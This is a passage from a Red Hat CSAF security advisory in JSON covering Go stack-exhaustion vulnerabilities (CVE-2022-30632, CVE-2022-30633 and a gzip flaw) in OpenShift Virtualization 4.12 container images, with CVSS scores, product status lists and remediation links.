refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: compress/gzip: stack exhaustion in Reader.Read" }, { "cve": "CVE-2022-30632", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107386" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This can cause an attacker to impact availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: path/filepath: stack exhaustion in Glob", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-30632" }, { "category": "external", "summary": "RHBZ#2107386", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-30632", "url": "https://www.cve.org/CVERecord?id=CVE-2022-30632" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-30632", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30632" }, { "category": "external", "summary": "https://go.dev/issue/53416", "url": "https://go.dev/issue/53416" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: path/filepath: stack exhaustion in Glob" }, { "cve": "CVE-2022-30633", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107392" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the \"any\" field tag, can cause a panic due to stack exhaustion.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: encoding/xml: stack exhaustion in Unmarshal", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", 